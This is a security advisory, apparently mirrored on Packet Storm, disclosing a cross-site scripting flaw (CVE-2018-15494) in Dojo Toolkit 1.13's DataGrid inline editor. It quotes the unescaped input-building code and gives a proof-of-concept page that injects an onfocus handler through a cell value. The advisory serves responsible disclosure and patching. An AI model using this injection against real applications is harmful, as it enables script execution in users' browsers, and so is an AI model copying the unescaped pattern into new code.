what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dojo Toolkit 1.13 Cross Site Scripting

Dojo Toolkit 1.13 Cross Site Scripting
Posted Aug 27, 2018
Authored by Moritz Bechler | Site syss.de

Dojo Toolkit version 1.13 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-15494
SHA-256 | f84edcee9a5e3daa0ab8b77ca5133492843ef287eff253e7a7157bf5d674faa8

Dojo Toolkit 1.13 Cross Site Scripting

Change Mirror Download
Advisory ID: SYSS-2018-010
Product: Dojo Toolkit
Manufacturer: JS Foundation
Affected Version(s): 1.13
Tested Version(s): 1.13, 1.10.7
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2018-07-02
Solution Date: 2018-10-13
Public Disclosure: 2018-10-24
CVE Reference: CVE-2018-15494
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Dojo Toolkit is a JavaScript framework for building JavaScript based
applications.

The manufacturer describes the product as follows (see [1]):

"A JavaScript toolkit that saves you time and scales with your
development process.
Provides everything you need to build a Web app.
Language utilities, UI components, and more, all in one place, designed
to work together perfectly."

Due to improper escaping, applications using Dojo Toolkit may be
vulnerable to
cross-site scripting.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The inline editing feature of the dojox.grid.DataGrid component fails to
properly
escape the cell value when using it as the input field's value attribute
while
editing is activated by clicking.

> formatEditing: function(inDatum, inRowIndex){
> this.needFormatNode(inDatum, inRowIndex);
> return '<input class="dojoxGridInput" type="text" value="' +
inDatum + '">';
> },


That allows additional element attributes to be introduced, including an
"onfocus"
handler that will immediately get executed when editing mode is activated.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof-of-Concept (PoC):


Demo website with Dojo's dojox.grid.DataGrid component:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<style type="text/css">
@import
"https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojox/grid/resources/Grid.css";
html, body {
width: 100%; height: 100%;
}
</style>
</head>
<body>
<script type="text/javascript"
src="https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojo/dojo.js"></script>
<script type="text/javascript">
dojo.require("dojox.grid.DataGrid");
dojo.require("dojo.data.ItemFileWriteStore");

dojo.addOnLoad(function(){
var g = new dojox.grid.DataGrid({
store: new dojo.data.ItemFileWriteStore({
data: {"items" : [ {"foo" : 'bar" onfocus="alert(1)"'} ] }
}),
structure: [
{ field: 'foo', width : '100%', editable: true }
]
});
dojo.byId("container").appendChild(g.domNode);
g.startup();
});
</script>
<div id="container" style="width: 100%; height: 100%;"></div>
</body>
</html>

When clicking the table row to start editing, the cell value is inserted
into a
text input's value attribute without proper escaping, resulting in
markup like

<input class="dojoxGridInput" value="bar" onfocus="alert(1)" "=""
type="text">

which introduces JavaScript code in the "onfocus" handler that gets
immediately
executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 1.14 of Dojo Toolkit.

More Information:

Vendor announcement: https://dojotoolkit.org/blog/dojo-1-14-released

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-06-04: Vulnerability discovered
2018-07-02: Vulnerability reported to manufacturer
2018-10-13: Patch released by manufacturer
2018-10-24: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Dojo Toolkit
https://dojotoolkit.org/
[2] SySS Security Advisory SYSS-2018-010

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-010.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en


Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close